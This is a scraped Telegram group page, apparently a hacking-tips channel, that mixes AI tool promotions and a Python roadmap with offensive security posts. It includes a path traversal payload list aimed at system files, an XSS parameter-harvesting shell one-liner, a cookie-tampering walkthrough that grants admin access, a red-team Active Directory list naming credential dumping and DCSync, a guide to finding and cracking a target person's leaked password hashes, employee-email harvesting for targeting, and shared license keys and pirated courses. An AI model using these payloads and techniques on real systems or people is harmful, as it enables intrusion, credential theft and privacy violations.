en
Feedback
Termux All Command [Telegram Group]

Termux All Command [Telegram Group]

Open in Telegram

Hello This Is Termux All Command Official Telegram Group. Here Share All Kind of Resourses. It is Also backup of Facebook Page Telegram Channel >> https://t.me/termuxcommandfull Facebook Page >> https://www.facebook.com/termux.command.full

Show more
1 327
Subscribers
+524 hours
+177 days
+5730 days
Posts Archive
CamXploit is a reconnaissance tool designed to help researchers and security enthusiasts check if an IP address is hosting an exposed CCTV camera. It scans common camera ports, checks for login pages, tests default credentials, and provides useful search links for further investigation. ⚠️ Disclaimer: This tool is intended for educational and security research purposes only. Unauthorized scanning of systems you do not own is illegal. Use responsibly. https://github.com/spyboy-productions/CamXploit

πŸ” Reconnaissance βœ… Subdomain Enumeration (amass, subfinder, crt.sh) βœ… Port Scanning (nmap, rustscan) βœ… Directory Bruteforcing (ffuf, dirsearch) βœ… Wayback Machine / Archive Recon βœ… JS File Analysis (endpoints, keys, secrets) βœ… ASN/CIDR Discovery βœ… Virtual Host Discovery βœ… Content Discovery (robots.txt, sitemap.xml) βœ… GitHub Dorking (company leaks, tokens) βœ… Search Engine Dorks (Google, Shodan, Censys) βœ… WHOIS & DNS Recon βœ… DNS Zone Transfers πŸ’£ Injection Attacks βœ… SQL Injection (classic, blind, time-based) βœ… Command Injection (OS injection, chained commands) βœ… XML External Entity (XXE) βœ… Server-Side Template Injection (SSTI) βœ… LDAP Injection βœ… CRLF Injection βœ… HTTP Host Header Injection βœ… GraphQL Injection βœ… NoSQL Injection (MongoDB, Firebase abuse) πŸ’₯ XSS (Cross-Site Scripting) βœ… Reflected XSS βœ… Stored XSS βœ… DOM-Based XSS βœ… Self-XSS (sometimes still exploitable!) βœ… CSP Bypass Techniques βœ… Mutation XSS βœ… Angular/React/Vue-specific XSS βœ… XSS in SVG/MathML βœ… WAF/Filter Bypass Payloads πŸ”“ Authentication & Session βœ… Authentication Bypass βœ… 2FA Bypass Techniques βœ… Session Fixation βœ… Session Hijacking βœ… JWT Attacks (none alg, key confusion) βœ… Cookie Poisoning / Tampering βœ… Login CSRF βœ… Password Reset Abuse βœ… Email Enumeration βœ… Username Enumeration βœ… Brute-force/Ratelimiting Bypass βœ… MFA Abuse (fallback channels, reuse) πŸ” Authorization & Access Control βœ… Broken Access Control (BAC) βœ… Insecure Direct Object Reference (IDOR) βœ… Horizontal Privilege Escalation βœ… Vertical Privilege Escalation βœ… Role Confusion / Scope Abuse βœ… Function-level Access Control Flaws βœ… Admin Panel Access via Frontend/API πŸ“‚ File Handling & Uploads βœ… Unrestricted File Uploads βœ… Content-Type Validation Bypass βœ… Polyglot Files βœ… SVG Upload with XSS Payload βœ… Upload Path Traversal βœ… Remote File Inclusion (RFI) βœ… Local File Inclusion (LFI) βœ… File Deserialization (PHP, Java, etc.) βœ… ImageTragick (ImageMagick Exploits) 🌐 Web Infrastructure βœ… SSRF (Server-Side Request Forgery) βœ… Open Redirects βœ… CORS Misconfigurations βœ… Clickjacking (X-Frame-Options issues) βœ… Host Header Injection βœ… DNS Rebinding βœ… HTTP Request Smuggling βœ… HTTP Parameter Pollution βœ… Cache Poisoning βœ… Subdomain Takeover βœ… CDN Misconfiguration βœ… Path Traversal (../ abuse) πŸ”„ Business Logic & API βœ… Logic Flaws (order bypass, payment manipulation) βœ… Race Conditions βœ… Mass Assignment βœ… Insecure API Rate Limiting βœ… Broken Object Level Authorization (BOLA) βœ… GraphQL Misconfig (introspection, object access) βœ… Unprotected Endpoints βœ… Lack of Input Validation (trust boundaries) βœ… Misuse of HTTP Verbs (PUT, DELETE, PATCH) ☁️ Cloud & External Services βœ… AWS/GCP/Azure Misconfig (S3 buckets, secrets) βœ… Leaky Environment Variables βœ… CI/CD Secrets (GitHub Actions, GitLab CI) βœ… Publicly Exposed Dashboards (Kibana, Grafana, Jenkins) βœ… Metadata Services Access (AWS IMDS, GCP metadata) βœ… Exposed .env, .git, .DS_Store, backup files βš™οΈ Misc & Advanced βœ… Prototype Pollution βœ… Deserialization Attacks (PHP, Java, Ruby) βœ… WebSocket Hijacking βœ… Caching Bugs (Varnish, NGINX configs) βœ… DNS Cache Poisoning βœ… Frontend Framework Bypasses βœ… CVEs on Outdated Libraries βœ… Supply Chain Attacks βœ… Software-Specific Exploits (WordPress, Magento, etc.) βœ… Secret Discovery (API keys, tokens in source or logs)

Public Buckets Search Amazon Web Services, Digital Ocean Spaces, Google Cloud Platform, Alibaba Cloud, Azure Cloud Storage contain a huge number of publicly available files. For example, by surname, first name or nickname you can find photos of people there. You can also search pdf, office documents, database dumps and more by full name, company name or domain. OsintSh Public Buckets Search online tool: https://osint.sh/buckets/ GrayHat WarFare Public Buckets Search online tool: https://lnkd.in/dUXgeHA5

Make Mobile Apps in minutes! Ai App Builder. https://rork.app/

12 AI tools you need to try in 2025 πŸ‘‡πŸ» 1. Gemini.ai (Solves anything) 2. Adobefirefly.ai (Text to image) 3. HeyGen.com (Create AI avatar) 4. Midjourney.com (Create art) 5. Topview.ai (Video editing) 6. Pika.art (Text to video) 7. Logodiffusiion.com (Create logos) 8. Jenni.AI (Essay assistant) 9. Zapier.com (Repetitive tasks) 10. Quillbot.com (Rewrite anything) 11. Addy.ai (Write emails) 12. Wordtune.com (Summarise notes) Download Future Tools App today and master AI Tools

All paid courses are now free: 1. Artificial Intelligence 2. Machine Learning 3. Cloud Computing 4. Ethical Hacking 5. Data Analytics 6. AWS Certified 7. Data Science 8. BIG DATA 9. Python 10. MBA LinkπŸ‘‡ https://drive.google.com/drive/folders/1CgN7DE3pNRNh_4BA_zrrMLqWz6KquwuD

Bypass payload that worked for me on imperva WAF 😱 Payload: click

Python Programming Roadmap | |-- Fundamentals | |-- Basics of Programming | | |-- Introduction to Python | | |-- Setting Up Development Environment (IDE: PyCharm, VS Code, Jupyter Notebook) | | |-- Running Python Scripts | | | |-- Syntax and Structure | | |-- Basic Syntax | | |-- Variables and Data Types (int, float, str, bool) | | |-- Operators (Arithmetic, Comparison, Logical, Bitwise) | |-- Control Structures | |-- Conditional Statements | | |-- If-Elif-Else Statements | | | |-- Loops | | |-- For Loop | | |-- While Loop | | | |-- Jump Statements | | |-- Break, Continue | | |-- Pass Statement | |-- Functions and Scope | |-- Defining Functions | | |-- Function Syntax | | |-- Parameters and Arguments (Positional, Keyword, Default) | | |-- Return Statement | | | |-- Lambda Functions | | |-- Anonymous Functions | | | |-- Scope and Lifetime | | |-- Local and Global Scope | | |-- Nonlocal Variables | |-- Object-Oriented Programming (OOP) | |-- Basics of OOP | | |-- Classes and Objects | | |-- Methods and Attributes | | | |-- Constructors | | |-- init Method | | |-- Instance Variables | | | |-- Inheritance | | |-- Single and Multiple Inheritance | | |-- Method Resolution Order (MRO) | | | |-- Polymorphism | | |-- Method Overriding | | |-- Operator Overloading | | | |-- Encapsulation and Abstraction | | |-- Private Attributes (using _ and __) | | |-- Properties (Getters and Setters) | |-- Advanced Python | |-- Modules and Packages | | |-- Importing Modules | | |-- Creating and Using Packages | | | |-- Decorators | | |-- Function Decorators | | |-- Class Decorators | | | |-- Generators and Iterators | | |-- Yield Statement | | |-- Custom Iterators | | | |-- Exception Handling | | |-- Try-Except Blocks | | |-- Raising Exceptions | | |-- Custom Exceptions | |-- Data Structures | |-- Lists, Tuples, and Sets | | |-- List Operations and Comprehensions | | |-- Tuple Operations | | |-- Set Operations | | | |-- Dictionaries | | |-- Dictionary Operations | | |-- Dictionary Comprehensions | | | |-- Advanced Data Structures | | |-- Collections Module (Counter, defaultdict, deque) | | |-- Heapq for Priority Queues | |-- Standard Library and Frameworks | |-- Built-in Modules | | |-- math, random, datetime | | |-- os, sys, json | | | |-- Popular Libraries | | |-- NumPy, Pandas for Data Analysis | | |-- Matplotlib, Seaborn for Visualization | | |-- Requests for HTTP | |-- File Handling | |-- File I/O | | |-- Reading and Writing Text Files | | |-- CSV and JSON File Handling | | |-- Working with Directories | |-- Testing and Debugging | |-- Debugging Tools | | |-- pdb (Python Debugger) | | |-- Logging Module | | | |-- Unit Testing | | |-- unittest Framework | | |-- Pytest for Testing | |-- Deployment and DevOps | |-- Version Control with Git | | |-- Integrating Python Projects with GitHub | |-- Continuous Integration/Continuous Deployment (CI/CD) | | |-- Using GitHub Actions or Jenkins | |-- Packaging and Distribution | | |-- Creating Python Packages | | |-- Publishing to PyPI

Red Teamers: 50 Active Directory Commands & Tools You Should Know 1. whoami – Show current user. 2. hostname – Get machine name. 3. net user – List user accounts. 4. net group /domain – Enumerate domain groups. 5. net group "Domain Admins" /domain – Find DA users. 6. net localgroup administrators – Check local admins. 7. nltest /domain_trusts – Discover domain trust paths. 8. nltest /dclist:<domain> – List domain controllers. 9. nltest /dsgetdc:<domain> – Get DC info. 10. set l – View logged-on users. 11. ipconfig /all – Full network config. 12. query user – View active sessions. 13. dir /a – Check hidden files. 14. tasklist /v – Enumerate running processes. 15. whoami /groups – List group memberships. 16. systeminfo – Dump system config. 17. netstat -ano – Active connections. 18. findstr – Filter output for key info. 19. powershell -enc ... – Obfuscated command execution. 20. runas /netonly – Use alternate creds. 21. Get-ADUser – Pull AD user data (with RSAT). 22. Get-ADComputer – Enumerate machines. 23. SharpHound – BloodHound collector. 24. BloodHound – AD privilege path mapping. 25. Mimikatz – Credential extraction tool. 26. Rubeus – Kerberos ticket abuse. 27. Seatbelt – Host recon and enumeration. 28. PowerView – AD recon via PowerShell. 29. SharpView – .NET PowerView port. 30. ADExplorer – GUI view of AD structure. 31. Certify – AD CS abuse. 32. PetitPotam – NTLM relay attack vector. 33. Impacket – Lateral movement & relay tools. 34. crackmapexec – Swiss Army knife for AD. 35. lsassy – Dump LSASS remotely. 36. pypykatz – Python Mimikatz. 37. WMIexec – Command execution via WMI. 38. RPCclient – Query remote services. 39. evil-winrm – Post-exploitation shell. 40. Invoke-ACLScanner – ACL misconfig checks. 41. Invoke-Command – Remote PowerShell execution. 42. Get-SPN – Service Principal Name discovery. 43. Kerberoasting – Dump and crack SPN tickets. 44. ASREPRoasting – Crack AS-REP hash. 45. Invoke-Kerberoast – In-memory Kerberoasting. 46. gpp-decrypt – Decrypt Group Policy creds. 47. SharpKeys – Custom key mapping. 48. Tokenvator – Token manipulation. 49. DCShadow – Fake DC for object injection. 50. DCSync – Dump creds from DC.

πŸ”° Collect emails, usernames from commit history of repos of an org from GitHub for more personalized targeting of employees. GitHub: ghintel.secrets.ninja

🌐 URLFinder URLFinder is a high-speed, passive URL discovery tool designed to simplify and accelerate web asset discovery, ideal for penetration testers, security researchers, and developers looking to gather URLs without active scanning. πŸš€ Features: β€” Passive source discovery β€” JSON/file/stdout output β€” Optimized speed & efficiency πŸ”— Source: https://github.com/projectdiscovery/urlfinder

πŸš€ Path Traversal - payloads ..\etc\passwd ..\etc\issue ..\boot.ini ..\windows\system32\drivers\etc\hosts ..\..\etc\passwd ..\..\etc\issue ..\..\boot.ini ..\..\windows\system32\drivers\etc\hosts ..\..\..\etc\passwd ..\..\..\etc\issue ..\..\..\boot.ini ..\..\..\windows\system32\drivers\etc\hosts ..\..\..\..\etc\passwd ..\..\..\..\etc\issue ..\..\..\..\boot.ini ..\..\..\..\windows\system32\drivers\etc\hosts ..\..\..\..\..\etc\passwd ..\..\..\..\..\etc\issue ..\..\..\..\..\boot.ini ..\..\..\..\..\windows\system32\drivers\etc\hosts ..\..\..\..\..\..\etc\passwd ..\..\..\..\..\..\etc\issue ..\..\..\..\..\..\boot.ini ..\..\..\..\..\..\windows\system32\drivers\etc\hosts

❗️ Find hidden GET parameters in javascript files assetfinder http://example.com | gau | egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"; done

A simple hunt can flip the whole game!πŸŒ€ While testing a web app, I noticed this suspicious-looking session cookie: Cookie: session=e3VzZXI6ZGFya3NoYWRvdyxyb2xlOnVzZXJ9Cg== I quickly ran it through Base64 decoding:
echo "e3VzZXI6ZGFya3NoYWRvdyxyb2xlOnVzZXJ9Cg==" | base64 -d  {user:darkshadow,role:user}
Wow 😳 β€” it's a JSON-style string in plain Base64. Time to see how deep the rabbit hole goes... I modified the role from user to admin:
echo "{user:darkshadow,role:admin}" | base64  e3VzZXI6ZGFya3NoYWRvdyxyb2xlOmFkbWlufQo
= Then replaced the cookie: Cookie: session=e3VzZXI6ZGFya3NoYWRvdyxyb2xlOmFkbWlufQo= BOOM πŸ’₯ Instantly, we got admin access!πŸ”₯ #collected

New Warp+ keys πŸ” Key: 2mku948q-b412KwS7-3D768pMa (1923837100 GB) πŸ” Key: n82PeR06-76wxM8L1-430d8HSu (1923837100 GB) πŸ” Key: N1BWk689-9cD08Ow7-v97c08Ka (1923837100 GB) πŸ” Key: 728o5zbS-e0c7d1F4-73o60IXj (1923837100 GB) πŸ” Key: VA467Ht0-04mhpl73-46Jz80VR (1923837100 GB) ✨ You can generate your own key in @generatewarpplusbot

πŸ”° How To Search For Data Leaks For Free. 1. Get hold of the username, email or phone of the person you want to search. In my experience, the former two have a higher success rate 2. Head over to https://breachdirectory.org 3. Paste the username, email or phone into the search box. 4. If you get any results, you’ll notice the passwords in a sha-1 hash 5. If you don’t, you’ll need another form of data to work with 6. Copy the sha-1 hash(es) and head over to https://md5decrypt.net/en/Sha1/ 7. Paste the hash and hope that it decrypts. Done!

Gemini 2.5 Pro is now available for free user! https://gemini.google.com/app